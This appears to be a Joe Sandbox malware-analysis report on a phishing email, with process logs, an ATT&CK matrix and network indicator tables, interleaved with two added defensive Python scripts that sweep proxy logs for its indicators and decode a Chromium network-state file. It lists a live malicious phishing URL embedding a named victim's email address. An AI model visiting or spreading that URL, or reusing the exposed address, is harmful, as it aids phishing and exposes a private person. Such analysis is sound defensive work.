                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935} DeviceTicket
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

Source: Yara match; File source: 0.1.d.script.csv, type: HTML
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; File volume queried: C:\Windows\SysWOW64 FullSizeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE; Process information queried: ProcessInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe; Queries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix

The number in parentheses after a technique is the count of matched signatures; techniques without one are listed by the matrix but were not observed in this analysis.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Windows Management Instrumentation, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task
Persistence: Browser Extensions (21), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Privilege Escalation: Process Injection (1), DLL Side-Loading (1), Extra Window Memory Injection (1), Login Hook, Network Logon Script, RC Scripts
Defense Evasion: Masquerading (11), Modify Registry (1), Process Injection (1), DLL Side-Loading (1), File Deletion (1), Extra Window Memory Injection (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: Process Discovery (1), File and Directory Discovery (1), System Information Discovery (14), System Network Configuration Discovery, Internet Connection Discovery, Wi-Fi Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Command and Control: Encrypted Channel (1), Ingress Tool Transfer (1), Non-Application Layer Protocol (3), Application Layer Protocol (4), Fallback Channels, Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop

                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Domains

Name                         IP               Active   Malicious   Reputation
chrome.cloudflare-dns.com    162.159.61.3     true     false       high
e8652.dscx.akamaiedge.net    23.209.213.129   true     false       high
code.jquery.com              151.101.130.137  true     false       high
developers.cloudflare.com    104.16.5.189     true     false       high
cdnjs.cloudflare.com         104.17.24.14     true     false       high
challenges.cloudflare.com    104.18.95.41     true     false       high
www.google.com               142.250.184.196  true     false       high
s-0005.dual-s-dc-msedge.net  52.123.130.14    true     false       high
gs.nthecatepi.ru             172.67.151.76    true     true        unknown
x1.i.lencr.org               unknown          unknown  false       high
URLs

Name                                                                                   Malicious   Reputation
https://gs.nthecatepi.ru/btb1KhWg/$terry.tuttle@yodel.co.uk                            false       unknown
https://chrome.cloudflare-dns.com/dns-query                                            false       high
https://code.jquery.com/jquery-3.6.0.min.js                                            false       high
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js                false       high
https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback   false       high
https://developers.cloudflare.com/favicon.png                                          false       high
https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js                   false       high
IPs

IP               Domain                       Country         ASN    ASN Name                                    Malicious
142.250.185.99   unknown                      United States   15169  GOOGLEUS                                    false
172.217.18.14    unknown                      United States   15169  GOOGLEUS                                    false
216.58.206.78    unknown                      United States   15169  GOOGLEUS                                    false
2.19.104.203     unknown                      European Union  16625  AKAMAI-ASUS                                 false
104.16.5.189     developers.cloudflare.com    United States   13335  CLOUDFLARENETUS                             false
23.209.213.129   e8652.dscx.akamaiedge.net    United States   23693  TELKOMSEL-ASN-IDPTTelekomunikasiSelularID   false
151.101.130.137  code.jquery.com              United States   54113  FASTLYUS                                    false
162.159.61.3     chrome.cloudflare-dns.com    United States   13335  CLOUDFLARENETUS                             false
199.232.210.172  unknown                      United States   54113  FASTLYUS                                    false
104.16.2.189     unknown                      United States   13335  CLOUDFLARENETUS                             false
142.250.186.99   unknown                      United States   15169  GOOGLEUS                                    false
3.219.243.226    unknown                      United States   14618  AMAZON-AESUS                                false
142.250.184.195  unknown                      United States   15169  GOOGLEUS                                    false
172.67.151.76    gs.nthecatepi.ru             United States   13335  CLOUDFLARENETUS                             true
104.17.24.14     cdnjs.cloudflare.com         United States   13335  CLOUDFLARENETUS                             false
142.250.184.196  www.google.com               United States   15169  GOOGLEUS                                    false
142.250.110.84   unknown                      United States   15169  GOOGLEUS                                    false
1.1.1.1          unknown                      Australia       13335  CLOUDFLARENETUS                             false
52.123.130.14    s-0005.dual-s-dc-msedge.net  United States   8075   MICROSOFT-CORP-MSN-AS-BLOCKUS               false
104.18.95.41     challenges.cloudflare.com    United States   13335  CLOUDFLARENETUS                             false
2.19.11.103      unknown                      European Union  719    ELISA-ASHelsinkiFinlandEU                   false
142.250.185.174  unknown                      United States   15169  GOOGLEUS                                    false
52.109.76.243    unknown                      United States   8075   MICROSOFT-CORP-MSN-AS-BLOCKUS               false
52.109.76.144    unknown                      United States   8075   MICROSOFT-CORP-MSN-AS-BLOCKUS               false
20.44.10.123     unknown                      United States   8075   MICROSOFT-CORP-MSN-AS-BLOCKUS               false
104.77.220.172   unknown                      United States   16625  AKAMAI-ASUS                                 false

IP (private range): 192.168.2.16
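The indicators from the domain, URL and IP tables, turned into a sweep over proxy-log lines. This is an added example and not part of the Joe Sandbox report: the log format, timestamps, client address, methods and status codes in the sample lines are constructed; the hosts, URLs and destination IPs in them are copied from the tables. Three details of the tables shape the logic. The domain table marks gs.nthecatepi.ru malicious while the URL table leaves the same URL at false/unknown reputation, so the sweep keys on the domain. Its address 172.67.151.76 is Cloudflare-fronted (ASN 13335) and shared with unrelated sites, so an IP-only hit is treated as a weak signal. And name resolution went through https://chrome.cloudflare-dns.com/dns-query (DNS-over-HTTPS, also recorded in the AcroCEF.exe Network Persistent State file further down), so the phishing host never reaches a local resolver and DNS logs alone would miss it; the sweep therefore reads proxy/URL telemetry and pulls the pre-filled victim address out of the `$email` path segment of the gs.nthecatepi.ru URL.

```python
"""Sweep proxy-log lines for the network indicators listed in this report.
SAMPLE_LOG is constructed for the example; only its hosts, URLs and destination
IPs come from the report's domain, URL and IP tables."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import unquote, urlsplit

# Domain the report marks malicious.
MALICIOUS_DOMAINS = {"gs.nthecatepi.ru"}
# Its address is Cloudflare-fronted (ASN 13335), i.e. shared with unrelated sites,
# so an IP-only hit is a weak signal rather than confirmation.
SHARED_FRONTING_IPS = {"172.67.151.76"}
# Third-party hosts the phishing page loaded (jQuery, CryptoJS, Turnstile): benign on
# their own, corroborating when they appear in the same session as the domain above.
CORROBORATING_HOSTS = {"code.jquery.com", "cdnjs.cloudflare.com",
                       "challenges.cloudflare.com", "developers.cloudflare.com"}
# DNS-over-HTTPS resolver from the URL table. Names resolved through it never reach
# the local resolver, which is why this sweep reads proxy/URL telemetry, not DNS logs.
DOH_HOSTS = {"chrome.cloudflare-dns.com"}
# Victim e-mail carried as one path segment, optionally '$'-prefixed, as in
# https://gs.nthecatepi.ru/btb1KhWg/$terry.tuttle@yodel.co.uk
EMAIL_SEGMENT = re.compile(r"^\$?([A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,})$")

# Constructed log: timestamp, client, destination IP, method, URL, status.
SAMPLE_LOG = """\
2025-03-17T09:13:02Z 192.168.2.16 172.67.151.76 GET https://gs.nthecatepi.ru/btb1KhWg/$terry.tuttle@yodel.co.uk 200
2025-03-17T09:13:03Z 192.168.2.16 151.101.130.137 GET https://code.jquery.com/jquery-3.6.0.min.js 200
2025-03-17T09:13:03Z 192.168.2.16 104.17.24.14 GET https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js 200
2025-03-17T09:13:04Z 192.168.2.16 104.18.95.41 GET https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback 200
2025-03-17T09:13:05Z 192.168.2.16 162.159.61.3 POST https://chrome.cloudflare-dns.com/dns-query 200
2025-03-17T09:14:10Z 192.168.2.16 142.250.184.196 GET https://www.google.com/ 200
"""


@dataclass
class Finding:
    line_no: int
    host: str
    verdict: str  # malicious | shared-ip | doh | corroborating | email-in-path
    victim: Optional[str]


def victim_from_url(url: str) -> Optional[str]:
    """E-mail address embedded in the URL path, lower-cased, or None."""
    for segment in unquote(urlsplit(url).path).split("/"):
        match = EMAIL_SEGMENT.match(segment)
        if match:
            return match.group(1).lower()
    return None


def classify(url: str, dst_ip: str) -> Optional[str]:
    """Verdict for one request, or None when nothing from the report applies."""
    host = (urlsplit(url).hostname or "").lower()
    if host in MALICIOUS_DOMAINS:
        return "malicious"
    if dst_ip in SHARED_FRONTING_IPS:
        return "shared-ip"
    if host in DOH_HOSTS:
        return "doh"
    if host in CORROBORATING_HOSTS:
        return "corroborating"
    if victim_from_url(url):
        return "email-in-path"  # pre-filled victim address on a host not yet listed
    return None


def scan_proxy_log(lines: List[str]) -> List[Finding]:
    """Parse 'ts client dst_ip method url [status]' lines; keep the ones that match."""
    findings: List[Finding] = []
    for line_no, line in enumerate(lines, start=1):
        fields = line.split()
        if len(fields) < 5:
            continue  # blank or malformed line
        dst_ip, url = fields[2], fields[4]
        verdict = classify(url, dst_ip)
        if verdict is not None:
            host = (urlsplit(url).hostname or "").lower()
            findings.append(Finding(line_no, host, verdict, victim_from_url(url)))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, object]:
    """Per-verdict counts, the victims whose address a URL exposed, and a confirmed flag."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.verdict] = counts.get(f.verdict, 0) + 1
    victims = sorted({f.victim for f in findings if f.victim})
    return {"confirmed": counts.get("malicious", 0) > 0, "counts": counts, "victims": victims}


if __name__ == "__main__":
    found = scan_proxy_log(SAMPLE_LOG.splitlines())
    for f in found:
        print(f"line {f.line_no:>2}  {f.verdict:<14} {f.host}  {f.victim or ''}")
    print(summarize(found))
```

Run as-is it reports one malicious hit with the exposed address terry.tuttle@yodel.co.uk, three corroborating script loads and one DoH contact; a session is marked confirmed only on the domain match, never on the shared Cloudflare IP alone.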
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1640423
Start date and time: 2025-03-17 10:12:30 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
Analysis Mode: stream
Analysis stop reason: Timeout
Sample name: f64da42c-e9a8-a0ac-437d-d14377da4643.eml
Detection: MAL
Classification: mal92.phis.evad.winEML@39/25@18/199
Cookbook Comments:
• Found application associated with file extension: .eml
• Exclude process from analysis (whitelisted): svchost.exe
• Excluded IPs from analysis (whitelisted): 52.109.76.243, 2.19.11.103, 2.19.11.102, 52.123.130.14
• Excluded domains from analysis (whitelisted): ecs.office.com, omex.cdn.office.net, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, eur.roaming1.live.com.akadns.net, neu-azsc-000.roaming.officeapps.live.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com, ecs.office.trafficmanager.net, c.pki.goog, omex.cdn.office.net.akamaized.net, a1864.dscd.akamai.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: gs.nthecatepi.ru
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: JSON data
Category: modified
Size (bytes): 403
Entropy (8bit): 4.953858338552356
Encrypted: false
SSDEEP:
MD5: 4C313FE514B5F4E7E89329630909F8DC
SHA1: 916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
SHA-256: 1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
SHA-512: 1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
Malicious: false
Reputation: unknown
Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
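The preview above is Chromium's Network Persistent State (the `http_server_properties` store) as written by the Chromium embedded in Acrobat, AcroCEF.exe. The following is an added example, not part of the report: it parses that JSON, decodes the alternative-service expiry (Chromium stores microseconds since 1601-01-01 UTC) and flags servers that are public DNS-over-HTTPS resolvers; the resolver list is this example's assumption. The expiry decodes to 2023-10-07T09:39:12Z, well before the 2025-03-17 analysis start, so this alt-svc entry was written before the run rather than during it; the DoH contact during the run itself is recorded separately by the chrome.cloudflare-dns.com rows in the domain, URL and IP tables.

```python
"""Decode a Chromium "Network Persistent State" file (http_server_properties).
NETWORK_STATE is the preview of the file AcroCEF.exe wrote during this analysis,
copied from the report; KNOWN_DOH_HOSTS is this example's own assumption."""
import json
from datetime import datetime, timezone
from typing import Any, Dict, List
from urllib.parse import urlsplit

NETWORK_STATE = (
    '{"net":{"http_server_properties":{"servers":[{"alternative_service":'
    '[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,'
    '"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},'
    '"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],'
    '"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},'
    '"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}'
)

# Public DNS-over-HTTPS endpoints to flag (assumption; add your own resolvers).
KNOWN_DOH_HOSTS = {
    "chrome.cloudflare-dns.com",
    "mozilla.cloudflare-dns.com",
    "cloudflare-dns.com",
    "dns.google",
    "dns.quad9.net",
}

# Chromium's base::Time counts microseconds since 1601-01-01 00:00:00 UTC.
WEBKIT_EPOCH_OFFSET_US = 11_644_473_600 * 1_000_000


def webkit_to_datetime(webkit_us: str) -> datetime:
    """Convert a Chromium/WebKit microsecond timestamp string to an aware UTC datetime."""
    unix_us = int(webkit_us) - WEBKIT_EPOCH_OFFSET_US
    return datetime.fromtimestamp(unix_us / 1_000_000, tz=timezone.utc)


def parse_network_state(text: str) -> Dict[str, Any]:
    """Summarise known servers, their advertised alternative services and DoH use."""
    net = json.loads(text)["net"]
    props = net.get("http_server_properties", {})
    servers: List[Dict[str, Any]] = []
    doh_hosts: List[str] = []
    for entry in props.get("servers", []):
        # "server" is an origin such as https://host[:port]; keep only the host.
        host = (urlsplit(entry["server"]).hostname or "").lower()
        alt_svc = [
            {
                "protocol": svc.get("protocol_str"),
                "port": svc.get("port"),
                "alpns": svc.get("advertised_alpns", []),
                "expires": webkit_to_datetime(svc["expiration"]).strftime("%Y-%m-%dT%H:%M:%SZ"),
            }
            for svc in entry.get("alternative_service", [])
        ]
        servers.append({
            "host": host,
            "supports_spdy": bool(entry.get("supports_spdy")),
            "srtt_us": entry.get("network_stats", {}).get("srtt"),
            "alt_svc": alt_svc,
        })
        if host in KNOWN_DOH_HOSTS:
            doh_hosts.append(host)
    quic = props.get("supports_quic", {})
    return {
        "version": props.get("version"),
        "servers": servers,
        "doh_hosts": sorted(doh_hosts),
        # Local address QUIC was last used from, if the store says it worked.
        "quic_used_from": quic.get("address") if quic.get("used_quic") else None,
        "network_quality": list(net.get("network_qualities", {}).values()),
    }


if __name__ == "__main__":
    print(json.dumps(parse_network_state(NETWORK_STATE), indent=2))
```

On this file the summary lists a single server, chrome.cloudflare-dns.com, advertising QUIC on 443 with the 2023-10-07 expiry, flags it as a DoH resolver, and reports that QUIC was used from 192.168.2.16, the analysis machine's address in the private-IP table above.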
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):0
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4C313FE514B5F4E7E89329630909F8DC
                                                  SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                  SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
